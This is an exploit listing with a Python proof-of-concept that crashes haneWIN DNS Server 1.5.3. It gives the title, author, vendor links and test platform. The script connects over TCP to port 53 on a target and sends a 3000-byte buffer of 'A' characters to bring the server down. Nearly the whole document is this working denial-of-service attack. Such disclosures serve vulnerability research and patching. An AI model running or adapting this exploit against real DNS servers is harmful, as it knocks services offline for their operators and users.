########################################################### [~] Exploit Title: haneWIN DNS Server 1.5.3 - Denial of service [~] Author: sajith [~] version: haneWIN DNS Server 1.5.3 [~]Vendor Homepage: http://www.hanewin.net/ [~] vulnerable app link:http://www.hanewin.net/dns-e.htm [~]Tested in windows Xp sp3 ########################################################### #POC by sajith shetty import socket target = "127.0.0.1" port = 53 try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target, port)) buf = "A" * 3000 request = buf s.send(request) data = s.recv(1024) print data except: print "DNS server is Down!"